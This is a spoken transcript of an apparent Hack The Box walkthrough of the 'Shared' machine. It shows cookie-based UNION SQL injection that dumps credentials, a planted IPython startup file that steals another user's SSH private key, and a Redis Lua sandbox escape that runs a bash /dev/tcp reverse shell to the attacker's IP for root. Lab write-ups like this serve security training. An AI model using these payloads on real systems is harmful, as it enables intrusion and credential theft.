Hey guys, welcome back. Hope you all are doing well. This is Mohammad Badruddija and today we are here to solve another machine from Hackthebox, and the machine name is shared. The difficulty level of this machine is medium. So let's go. We start this machine from the nmap scan as usual. So nmap space hyphen s capital V for the version enumeration, space hyphen s capital C for default scripts, and today I'm going to perform an aggressive scan. So space hyphen capital A switch is for aggressive scan, and I'm also going to use the timing template, which is uppercase T, and the intensity I'm going to use is 4. So it's from 0 to 5, I think, or 1 to 5. And the target IP is going to be 10.10.11.172, and I want to save the scan results in a file named as default.nmap. The scan result is already saved in this file. So let's go and we will see the scan result. So cat and default.nmap. So there are few ports open, like port number 22, port number 80, port 443, and that's it. These ports are open, and as you can see here on port number 22 the service running is OpenSSH 8.4. On port number 80 there is HTTP and the service is NGINX 1.18.0. Here you can see http-robots.txt where you have 81 disallowed entries are there. Okay, so among them there are 15 shown, so you can see here all these entries here. Now did not follow the redirection to share.htb. I already created this record in my etc host file so that I can access the site with the name, right? Rest here, port number 443 is also open, so maybe we will get some information from the SSL certificate. No, so let's go. We start performing enumeration from the port number 443. So if you just put here HTTP, it is going to automatically make it HTTPS like that, right? So here, as you can see, this is a shopping cart site and everything looks pretty well. And as you can see here, there are some categories like for men or women, accessories, and all these, right? So what we can do here, I already open up the burp suite and I'm going to capture all these requests, whatever we are going to perform here. But before that, it's always better to run some enumeration in the backend process. So I'm going to use FUF tool. So FUF space -w for the word list, user share word list, and I'm going to use dirbuster. Inside dirbuster there is directory, lowercase 2.3 medium space -u, which is going to be URL. So http:// share.htb, and I'm going to put the header here. Header is going to be host : fuzz.share.htb. Okay, now I'm going to mash the status code just 200, and number of threads I'm going to use 60. Hit enter and it's working. Let it work. Come here. So we start seeing here parameters and values. So I tried in many places something for SQL injection, but everything looks like something is filtering these values or sanitizing these values. So whatever you put here like single quote, it is always going to vanish from here. So I'm going to start the burp proxy on my browser, and proxy is already here. Just manage a bit. Okay, so whatever we do, we will get the result here. So I'm going to choose this bag or any product. Come to the history tab, and we are getting the request here. Okay. Again, go to this t-shirt, it's here, and now if I say add to cart, okay, it's adding in the cart. Now just proceed to checkout, and once we come here to checkout, just proceed to checkout. There is something, the thing is, it's going to redirect us to the checkout.share.htb. So there is a valid subdomain, but this subdomain is not in our etc host file. That's why it's not resolving this one. So let's see, we already fuzzed the subdomain, and here also we got the checkout. So that means we need to create it in our etc host file, and for that I'm going to say echo 10.10.11.172. this is the target IP. checkout.share.htb. so make this entry in the etc host file, right? And now that should be resolved. So refresh that, and it's resolved here. But let's put credit card number and CVV 123, pay that, and payment is successful. Everything seems perfect here. So now I'm going to close the burp proxy, and now I'm going to analyze each and every request one by one. Okay, so fine. So here, this is the first request where we open the site, the category, and the category ID was 4. So here everything seems okay. This is Prestra shop and something. This is the cookie. This is the PHP session ID, and this cookie. Let's see what is this is. Maybe this inspector or burp suite auto detected that. So there is no detection. These are the modules. Block reassurance, okay, themes, not interested. Checkout, yeah, this one, because here the subdomain, the domain is changed to its subdomain checkout. So this is the request for checkout, and if you see this request closely, there is no response because at that instant we did not actually add the subdomain in our list, but here we added the subdomain and we refreshed the page on this request. So here, as you can see, there is no extra parameter or values, but the cookie is interesting. Why? Because there is another custom cookie, which is custom cart, right? So let's see what it is. So we can actually highlight this, and here in the inspector we can see the decoded form of it. So let's go and check the cookie for this. Come here. So I have this plugin which is cookie editor. If you don't have, just install it, because this is going to help you a lot. So here, as you can see, there are 2 cookies in this page. So the first one, this one is the actually custom one. So if I go back here and just take this value in the clear text form, so copy that and come back here, go to the cookie editor, and I'm going to put it like this, paste that, and from this little button just save it, and I just want to refresh it one more time so that I can see it's working perfectly or not. So it's working perfectly. Okay, now I try single quote, okay, and just save it and refresh the page. So once you refresh the page, you can see something gets changed. So whatever is that, but we find here indication of SQL injection. So I put there single quote. Now I'm going to put 2 slashes. Again, I'm going to save it and hit enter. Still, it's not showing the correct result. So I'm going to add space and one more dash, save that and click here. Okay, now this time, as you can see, this product is available. That means this query is working fine, and between this single quote and dash we can put another query or another query syntax. Fine, so let's go and we start the enumeration. Okay, so let's say here we will try union first. So union select null. So if the query return only one column, then it will be the correct one. So okay, not found means there are more columns. So I'm going to add here one more null. Okay, save that and refresh the page again. Still we did not found anything here. That means there are more columns returned by the query. So add more null. Okay, save it again and refresh the page, and this time we can see here the value is there. So that means this query in the backend, the query executed and the query returned 3 columns. If you do not have this cookie editor, you can also go to the inspector, go to the inspect and go to the storage. Here you have the cookie. You can also change the value from here, right? So now let's see what we can do more. So come back here, custom query. Let's see if I put here 1, the data type 2, and let's say 3. Save it and refresh. So that means the syntax is correct. Maybe these are the strings, don't know. Let's try here database. We need to try to read the database, which database is running there. So if the database is MySQL, so that should work and we should get the database, and nothing. That means on this column we cannot return the value. So let it 1, and instead of 2 I'm gonna say database and save that, refresh. Still nothing. Let's try here. Paste that, database. So this one did not work. Let's try the third one, the third column, and refresh the page. Nothing. So there is something wrong with the query, or maybe the database is not the MySQL. We see that. So what I'm going to do here is let's try to remove this one, save, and as you can see 2 appears here. So where we put the 2, 2 is this one. So that column, that value appears here on the second column. That means only second column value is readable value. So instead of putting this database here, just say 3 here, and instead of 2 I'm gonna put this value, right? So save it and refresh this, and as you can see the database name is checkout. So we found first blood on the SQLi. So I'm going to write here this query, and we will build rest of the query on this. So copy that, come back here, paste that. Okay, now if you want to read the version, we can read it like this, version. Copy that, come back here, come here, and just paste that. Okay, save it, refresh it, and this is the version. So copy that, come back here. So the database name was checkout and the version is this. Okay, now let's go try to read the database, what are the tables there, what are the columns there, we will see that. So again, I'm going to just copy this value and paste it here, and we will build up on this, right? So union select 1 is 1, and we know that only this second column is the returned value we got on the web page. So here what I'm going to say, I'm going to write another query, which is, let's say, select group underscore concat, and we need to enumerate first tables. What are the tables there? So table underscore name, and from where? From information underscore schema dot tables or tables I think, and where table underscore schema is equal to database name. So database, so this one will return database name, which is checkout, and from information schema dot tables it will grab the table name. Okay, so let's see what are the tables there, and I think that should work. So copy that and return back to the browser, come back here, come here, and just paste that. Save it, don't forget to save it, and refresh the page. And as you can see, there are two tables. One is user table and another one is product table, right? So we have users and product. It's user, not users. Okay, now let's see. I'm interested in user, so we are going to enumerate the user, and what we are going to enumerate, we are going to enumerate the columns. So everything is going to be same here, just we need to put the column underscore name, and here instead of tables, columns, and from information table underscore schema, instead of table schema we are going to say table name this time. So table name, and the table name is going to be users, and this is string, so we put it in the single quotes, right? Here you can also put one more condition where the table name is equal to users and the database and the table schema is equal to database, something same like that, right? So let's go. We are going to take this, copy back here, come back and paste it, save it, refresh, and there are three columns: ID, username, and password. So I'm going to copy that, come here, we have these. So now let's go and we are going to read the username and passwords. You can do it one by one, just read the username, then read the password, or you can read it both of these values or both all these three columns at the same time. And how we will do that, this is easy, just you need to change few things. So now we need to concat the values, but now here instead of column name we put the column name because we get the column names here. So username, okay, comma, let's say password, from instead of information schema, because now we know the table, so we can say here from user table, right? And that's it. So let's go and run this one, copy that, come here, come here. Oh, come on. Paste that, save it, and refresh the page. So as you can see, the username is okay. Now the username and the password hash gets messed up, so you can do it pretty simple. You just need to put here some string with which you want to separate them. So let's say this, okay, save it, copy, come back here, in the cookie here, and let's just put it here like this, like that. Okay, so don't forget to save it and just refresh that. So now as you can see, the username is separated by the password hash. So now we have username and password hash. Take this, come back here, paste it. Now username is going to be James Mason, right, and the hash is equal to this. Copy, paste that, and now we need to crack this. So let's go and we will start here crack station, and that seems because that seems MD5. Why? Because that seems 32 characters, but we need to confirm it first. So as you can see, we got here only the one valid subdomain. Now echo space -n, paste that, wc space -c for number of characters. So you can see there are 32 number of characters. So okay, we are in the crack station, and just paste that hash here. Of course I'm not robot, and crack the hash. So this is the password. Very well, we get the password, so put it here. Now we just need to log in. So because SSH port is already open, so we will try to log in with the SSH port. So clear that, SSH space hyphen, not hyphen, James underscore Mason at 10.10.11.172. Hit enter, and let's go copy that and paste it here, and we logged in. So now we are James user. Let's try basic enumeration commands. Okay, this is interesting result because now you can see JSON user is actually the member of developer group. So this is always good, and I'm going to keep it with me. So copy that real quick, come here, paste that, save it. Okay. ls space -la. So nothing much interesting here in the user's home directory, but we need to see what we can do, means what we can read and what we can write as developer, as a member of developer group, right? So clear that, and the command is going to be find slash from the main root directory, let's say hyphen group, and we are in the group of developer. Okay, it's developers or developer. Okay, and whatever we can writable. So whatever is writable as this group, what we can write, where we can write, and space hyphen not space path. Okay, and again I'm going to just copy this, space, paste that, okay, not path, and let's put here proc slash, okay, that's good, slash dev slash null. So hit enter. What this command is actually doing, I'm saying find as developer group what we can write, or any member in the developer group have write access, but don't see this path and don't see this path, right? So now we can see here we get a result, and as you can see, this directory we have the write permission on this directory. So let's see, ls space -la slash opt, and you can see on this directory developer group can read, write and execute. So this is the first thing. Let's see as a developer group what we can read. So everything, let's say copy, everything is same, just we need to change few things. Like the first thing what we can read, so read means we need to read the files, so type is going to be file, as group developer, and whatever is readable, so readable, but don't see the path, this sys and proc, and just hit enter. So there is nothing special. Okay, we focus on this. Right, we can write on this place, but what to write we don't know, and this is the first thing. Okay, let's go and we enumerate more. So today we are going to enumerate manually as much as possible. So I'm gonna see how many users are there. Those can run bin bash. All these are basic commands, but very powerful in terms of enumeration and give you a lot of information about the target. So you can see here there are 3 users. We are James Mason. There is another user, Dan_Smith. Just copy that, come here, paste it, save it, and we need to see. Okay, ls space -la /home/Dan_Smith. There is anything IPython, and other user can read and execute. So this is the home directory. This directory is this is the directory, yeah. So this is the directory, but other users can read and execute. So let's go, let's see what's inside this IPython. So cd/home/Dan_Smith /.ipython. Okay, and ls space -la. There is profile default, and still this profile default also we can read and execute. So cd profile default, what's inside that? There is database directory, history log, security and startup. So these 2 files, security and PID, other users, like we are James Mason, so we cannot even read anything from these directories. Logs, we can read logs directory, and history, SQLite, DB. Let's see what's inside startup. ls space -la startup. So inside startup there is readme, cat startup readme. So here inside readme we have a message which is saying this is the IPython startup directory .py and .ipy files in this directory will be run prior to any code or file specified via the exec_line or exec_files configurables wherever or whenever you load this profile. Okay, files will be run in lexicographical order, so you can control the execution order of the file. Let's go and we will try to see the processes, and especially we are trying to hunt any process that is ran by other user, which is Dan_Smith, and for that we need to download a file here which is pspy. So I already have this file in etc opt. If you don't have, I will put the link in description section so you can grab that file from there. So ls space -la pspy64, yeah, we have it. So python 3 space -m http.server80, and let's come here /dev/shm, and here I'm going to put, you can also put it in the temp directory. So wget http:// this is my IP, and we need to download this file, right? Hit enter. And we have this file. So just change the permission for the execution. So pspy. Okay, now we can execute this file. And now I'm going to open a new tab, and here I'm going to another SSH session. I'm going to make another SSH session. So James_Mason at shared.htb, and we already have the password of this user, this one. So Control C, come back here, paste that, hit enter, and we are logged in. Now dev/shm and just execute the pspy 64. Okay, and 1001. So 1001 means any process you see running as 1001 means this process is running as from the Dan user. So I'm going to copy this and paste it with me, and we will analyze it, what it's doing. Okay, Mr. Dan, what you are running here. So the first thing first, Dan user is running actually killing the process of IPython. So the first thing, what is IPython? What is IPython? So what is IPython versus Python? So IPython is an interactive command line terminal for Python. It is created by Mr. Fernando in 2001. IPython offers an enhanced real eval print loop environment, particularly well adapted to scientific computing. In other words, IPython is a powerful interface to the Python language. So it is an interface. It provides you a sandbox environment, something like this. Okay, so and we see that there is IPython directory in the Dan user directory. You can see here there is IPython directory, and inside that directory we found profile_default, and there is a file readme which is saying that this is the default path for the startup, and anything you put here is going to be executed first, and this is the first file 00. So once it's going to its default location, it is going to execute this file first, then this file, then this file, right? So that means profile_default, and inside profile_default there is a startup. But the thing is, what we found here as developer group, we have write permission on this directory, right? So, and if you see this process is same like this one. Here it's killing the process for IPython, but then it is changing its directory to opt/scripts_review. It's going to this directory and then executing IPython again. So that means if we put here this profile_default and startup directory, and inside that directory if we put any file like 00.py, so whenever this process ran by Dan user, it is going to process our Python file. That is the way, I think. So let's go and we create that. So cd/opt, and inside opt there is scripts_review. So mkdir, we need to first put that Python_default, copy that, paste that here, /startup, and this is going to be inside opt/scripts_review, right? So this is the path. Let's say first of all we are going to create this file, so copy that, paste it here, hit enter, and then we are going to create this startup. So copy and paste that. Okay, Okay, so the thing is, you can see here we created this directory, but after that, once we try to create a startup directory in profile_default, now it's saying no such directory or file. And once we try listing inside scripts_review, there is no directory. That means something is deleting these directories. So we need to be very quick. And for that, let's put the commands here, and we will directly copy paste very fast. So mkdir space -m 777, we give all the permissions so that Dan user can also execute this one from this directory. Dan user also have all the permissions, right? Because the IPython is executed by Dan user. So if we do not give permission, this IPython is not going to execute any file from these directories, right? So first we create this. Copy that, paste that. So first of all, we create this directory, then we create this directory, and then to execute, we will say echo, and let's say import OS module, and then let's execute os.system, and here we say echo, because we also find that there is .ssh directory in Dan user's home directory. So Dan_Smith. So as you can see, there is .ssh directory. So let's try to read its IDRSA key for the Dan user. So echo, let's say not echo, we can cat this file, cat /home/dan_smith/.ssh/id_rsa key. Okay, and paste it to /dev/shm/id_rsa. That's it. Fine. And we do not need to put it here anything, right? So you can just specify this as one command like this. Okay, and then we need to put everything, this whole string where in this path, opt scripts_review on this path. So copy that, copy and paste it here like this, right? In a file, let's say a file named as 00.py, which has this content, and this content is going to import a OS module. Then it is going to execute the system command. And what system command it is going to execute? It is going to cat the IDRSA file of Dan_Smith user, and then it is going to save the content of that file in this location dev/shm in a IDRSA file. So, and we can also minimize this command more with this. Okay, so in one liner it is going to create both of these directories, and in another line it is going to create the file. So just copy that, come back here, clear that and paste that. Okay, now copy this one before, so that we can make it fast. Hit enter and Control-Shift-V, hit enter. Now it's there. So ls space -la, we should see the file here, directory ls space -la profile_default. I think now it's deleted very fast. But if the IPython executed, we should have dev/shm, we should have IDRSA key, which is here. Yeah. So as you can see, as we put this, we created these directories according to the message we got. We created these two directories and put a file inside this directory named as 00.py, and from this we grab the IDRSA key for the Dan Smith user. Now as you can see here, the file is copied and the owner of this file is Dan Smith user, but we have the read permission. So let's try to read it. cat/dev shm IDRSA, hit enter. So this is the IDRSA private key for Dan user. I'm just going to copy that, copy, come to my terminal here, and let's say nano ID_RSA, and just paste that. Control O, enter, Control X, chmod 600 ID_RSA, and now I don't need that. SSH space -i ID_RSA, and the username is Dan_Smith at shared.htb. Hit enter. Hopefully we should get the shell. And yeah, we are now Dan user. So ls space -la, we have the user flag here. So this is the user flag. Now let's again write id command, and again this is interesting because now as you can see here, James user was the member of developer group, and Dan Smith user is also a member of developer group, but he is also a member of sysadmin user. So the enumeration type is going to be same. We are first going to see what we can read as a member of this group, sysadmin group, and what we can write as a member of sysadmin group. So the commands are going to be same. Find slash space hyphen type. Type is going to be file space hyphen group, and the group is sysadmin. And we should say readable. What is readable as this group, as a member of this group, sysadmin. And now we have to mention not space hyphen path, and which path we don't want to see is sys slash star space hyphen not space hyphen path, and come on, proc slash anything inside proc we don't want to see, anything inside sys we don't want to see. So def slash null, and just hit enter. So as a member of sysadmin group, we can read this file, and we will see in a minute what is that file. Just paste it here. So this is actually a file where we have, as a sysadmin group, we can read and execute this file. But what this file is all about, what kind of file is that? So file command, and then just specify the path of the file, and that seems a binary file, executable file. Okay, so you can see here it's LSB executable 64-bit ELF. Okay, so this information is very, very important, actually all of this. So I'm going to copy that and paste it with me again, save it. So just separation of these commands. Okay. You can take the screenshots too. So now let's try to execute this file, what actually this file is. Hit enter. So that seems log into Redis instance using password. Redis server is there. net state space hyphen tlpn, and yeah, Redis server is running. So this is the default port for Redis server 6379, and it's running. So this is again very useful information, and I'm going to keep it with me. So paste that, save it. So this is the important port here, and Redis server is running. So what version of Redis server here? We need to see that. So Redis space hyphen server space hyphen small v, and this is the version of Redis server. Now we need to enumerate a bit more, or we can directly go to internet or search exploit databases, and we try to find out the vulnerability or any exploit available for this version of Redis server. Okay, but we will actually do some more enumeration. Actually, once we execute this file, it's saying logging to Redis instance using password. That means this file is logging with the password. So maybe the password is inside this file. Let's see which strings is there. No, not there. Let's transfer this file to our machine. But before this, I also want to see what we can writable here. What are as a sysadmin group? So find slash group. Come on, group sysadmin. Actually, the mic is just in front of me. I cannot see my keyboard. Sysadmin space hyphen writable, and again I'm gonna say not space hyphen path slash sys slash star, and not space hyphen path, and this time I'm gonna say proc directory. I don't want to see anything from the proc directory, and to slash dev slash null. Hit enter. So there is nothing important. Okay, now let's start the first of all, we need to go to this location. Okay, cd here, and from this point we need to start the Python server. HTTP dot server on port number, no, 80 is already running. Let's say 7575. Hit enter. Port is already web server is published. Just come here and let's say wget HTTP target IP 11172 on port number 7575, and which file we need to download. We need to download this file, right? So paste here, hit enter, and the file is going to download it. So I'm gonna pause it and come back once it's finished. Okay, so we successfully copy this file here on my attack box. So if I say ls, and this is the file. So let's try to read it with the strings. Clear that, strings and Redis dev, like this. Just hit enter. Oh, it's too big file, but we may have some idea. So this is very difficult to actually get things here. Okay. Let's see. Clear strings, anything containing password. So we need to think again. So we go one step back here on the same point. And what we thought before, that according to this message, this file is actually logging to Redis instance using the password. So using the password means this file is using the password, and it is logging to the Redis instance. And this is the information of the Redis server, and you can see, say, the Redis instance. That means once we execute this client, you can say that this is actually the client or the connector. So whenever you execute that, it is going to connect to the server, and connecting the server using some kind of password, and it's connecting to the server on this port, right? Okay, so that means if we try to capture the traffic while executing this connector, maybe we get something. So let's see. Here again we are going to execute this. Okay, we are going to execute this, and in another terminal, like here, okay, in another terminal we are going to capture the traffic on port number 6379. So any traffic coming to 6379, we are listening. So this will act as a server who is listening on this port, and once this is going to try to connect on this port, so this one get the hit, right? So just hit enter here. Oh, it's running the strings command, sorry. Redis, we can change mode plus X and Redis. Now execute it like that. And yeah, as we executed, you can see it's trying to get the information of the command result. It's saying timeout because maybe it is not getting the right IP address. It's just getting the 6379 port or anything, because once it connected to the server also replies something to this, but here it is not getting the reply, so it's timeout. Now the interesting part is here what we got. So you can see there is auth. So auth is actually the command in the Redis CLI. So if we close this one here, and Redis CLI is there or not? Redis CLI, yeah. Here, as you can see, once we hit enter, it is going to connect here. But if we say list, or let's say module list, so it's going to say no authentication. So authentication is required, and we did not provide any authentication. So to provide the authentication, we need to specify the auth command, and once we write here auth command, it is going to show you how you can provide the authentication. So you need to put the username and the password, right? Okay, so here you can see it is going to give us few things like asterisk to $4, then authentication, then $16, and then this string. So let's try this string. Maybe that's the password. Paste that and hit enter, and yeah, okay. So that means we are now authenticated, and as you can see, we got the OK message here. So this is the password for that. So I'm going to copy this, come here, and password is going to be this. Save it. Okay. Oh, come on. Module list. So there is no module, empty array. There is no module. Now we need to enumerate more this Redis CLI. So the best path for this, Hackthebox Redis enumeration, Redis enumeration Hackthebox. Okay, and you can see 6379 port number is there. Just open this and follow the path to enumerate it. Okay, and it is very good source to actually pen test. Okay, so now the enumeration starts from here. You can see this is the nmap scan. You can also execute the script for extracting the Redis info. Start. You can try to connect with the netcat, or you can use the Redis CLI. Okay. There is the thing for authentication. So authentication is required, and there is default credentials for Redis authentication. So by default, Redis can access without credential. However, it can be configured to support only password or username password. So in our case, it's only password because we do not put here any username. So this is good. And the default username is default. Okay. We can also try this as username default. So I recommend you to actually go through this process and try to enumerate more and more, follow this guide, because I have the time limitations. So I'm directly going to the point and do the privilege escalation. But for you, it's highly recommend to go through this guide. Okay, so for me, this actually Lua sandbox bypass work. There is one CVE on 2022. So I'm going to open this and let's see what's it's doing. So here is the thing. You can execute this and it will ask you IP address and port number and everything, and then it will give you the ability to execute the shell command as root, because this Redis is installed by root and ran by root actually. But for me, I'm going to see this exploit. Okay, so the thing is, as we see here, this is vulnerability of Lua sandbox bypass, and that provides you the remote code execution, and through that remote code execution you can escalate your privilege to root. So this is the Lua, and as you can see here we have the library for it, and it's using Lua OpenIO, and with that it's using popen function to execute the command. So what I'm going to do, I'm going to copy this line, come back here and paste that. Okay, and let's do the task. So the package is going to be .load library, and it is going to load this library. Let's try to find out whether this library is there or not. First thing first. So copy that and come back to the Dan. Exit. We don't need that. Clear this and ssh space -i idrsa Dan _ Smith at shared.htb. Hit enter. So ls space -la, paste that. So it's there. This is the most important part. If this library is not there, then the problem begins. So the first thing we passed, first test we passed, this library exists on the target. Okay, now if this library is there, then we don't need to worry anything. We just need to put the command here. Okay, so to execute the command, what I'm going to do here is let's put a file. Let's say I will say echo, and with the bash I'm going to execute this reverse shell. Okay, /dev/tcp/ my IP, which is 10.10.14.13 slash, I'm going to take this shell on 4545 port, and let's say 0 greater than and 1. Okay, and I will put this in dev/shm as file name, let's say test. Okay, so first of all, create this file. So copy, come back here and paste that. Oh, come on. Control C, copy, come here, paste that. Okay, and just hit enter. Fine. So let's see this file is created or not. /dev/shm. So test file is there, and we actually need to provide execution permission on it. Okay, because this file not here, this file exists in dev/shm/test. Okay, so this is the first part. Now we will execute this on the Redis with the CLI, but here the most important part is still we need to complete, which is this cmd command. So instead of this cmd, what we are going to do is we are going to say cat, let's say /dev/shm/test. So it is going to open this file, then pipe and execute it with bash. Okay, and we don't need this to read. So what file we created here that has reverse shell, right? So it is going to open this file and read the content of this file and execute it with the bash. This is the only thing, and rest of the part here, return, and here in the rest of the part here we put it as 0. Fine, and that's it. And we just need to listen to the port. So we need to start netcat. So before that, this just copy that and come back here, and here I'm going to open one more terminal. Let's see, nc --nlvp 4545, hit enter, and here I'm going to first connect with the Redis. So Redis --CLI. Okay, connect. Now we need to provide the authentication, and authentication is going to be the password. So copy that, paste it here, hit enter, we are in. Now we just need to execute this command, but this command with eval function. We forgot the most important thing. Okay, so eval local, everything seems okay. Copy that, come here, paste that, and hit enter, and we get the shell. So who am I? I'm root. Host name is shared, and id is root. Clear again. Oh, so export term is equal to xterm, clear, id is root. So cd/root. Oh, we are out. So this shell is actually not up to the mark, not very stable, but yeah, we get it. So Redis authentication, where is authentication? We need to provide it. So come on, authentication. This is the authentication, this is the password. So copy that, paste it, hit enter. Then before executing this, start the netcat listener, hit enter. We get it, cd/root, do it fast, and ls space -la. So root is there, cat root dot text. So there we go, we have the root flag and we are the root. Now the shell is again disconnected, but we get the shell and we get the root. After getting the root, we can do many more things, and we can also execute here more stable shell. Okay, we can download socat and we can execute socat, because we can execute the commands here. So we can also grab the id RSA key if there is SSH, but the SSH directory is not here. So I leave it on you, try to get a more stable shell, but for now we actually compromise the whole system. So that's it for this video. If you like the content, please like, subscribe and share. See you in the next video. Bye.